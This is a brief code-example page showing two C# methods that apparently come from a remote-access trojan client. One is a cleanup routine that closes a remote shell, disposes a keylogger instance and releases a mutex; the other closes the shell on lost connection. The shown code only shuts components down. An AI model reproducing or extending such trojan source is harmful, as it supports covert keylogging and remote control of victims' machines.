Ejemplo n.º 1
0
 private static void Cleanup()
 {
     Eylemİşleyicisi.CloseShell();
     if (Eylemİşleyicisi.StreamCodec != null)
     {
         Eylemİşleyicisi.StreamCodec.Dispose();
     }
     if (Keylogger.Instance != null)
     {
         Keylogger.Instance.Dispose();
     }
     if (_msgLoop != null)
     {
         _msgLoop.ExitThread();
         _msgLoop.Dispose();
         _msgLoop = null;
     }
     MutexHelper.CloseMutex();
 }
Ejemplo n.º 2
0
 private void LostConnection()
 {
     Eylemİşleyicisi.CloseShell();
 }